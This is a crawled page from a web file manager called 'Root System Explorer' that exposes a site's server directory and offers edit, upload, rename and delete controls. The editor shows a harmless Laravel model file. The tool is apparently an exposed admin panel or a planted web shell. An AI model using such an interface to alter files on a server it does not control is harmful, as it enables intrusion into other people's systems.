[ Root System Explorer ]
Location:
Root
/
var
/
www
/
html
/
app.acma.in
/
AppBackUp
/
Model
+ Folder
+ File
Upload
Editing: Vehiclereport.php
<?php namespace App\Model; use Illuminate\Database\Eloquent\Model; class Vehiclereport extends Model { protected $fillable = [ 'id','title','doc','updatedate','cat','docyear']; /** * Indicates if the model should be timestamped. * * @var bool */ public $timestamps = false; /** * The table associated with the model. * * @var string */ protected $table = 'vehiclereport';}
SAVE CHANGES
[ CANCEL ]
Name
Type
Actions
.. (Parent Directory)
📄 Circulars.php
FILE
Ren
[EDIT]
DEL
📄 EV_Reports.php
FILE
Ren
[EDIT]
DEL
📄 Event.php
FILE
Ren
[EDIT]
DEL
📄 Guest.php
FILE
Ren
[EDIT]
DEL
📄 MemberDB.php
FILE
Ren
[EDIT]
DEL
📄 Notification.php
FILE
Ren
[EDIT]
DEL
📄 Publication.php
FILE
Ren
[EDIT]
DEL
📄 Vehiclereport.php
FILE
Ren
[EDIT]
DEL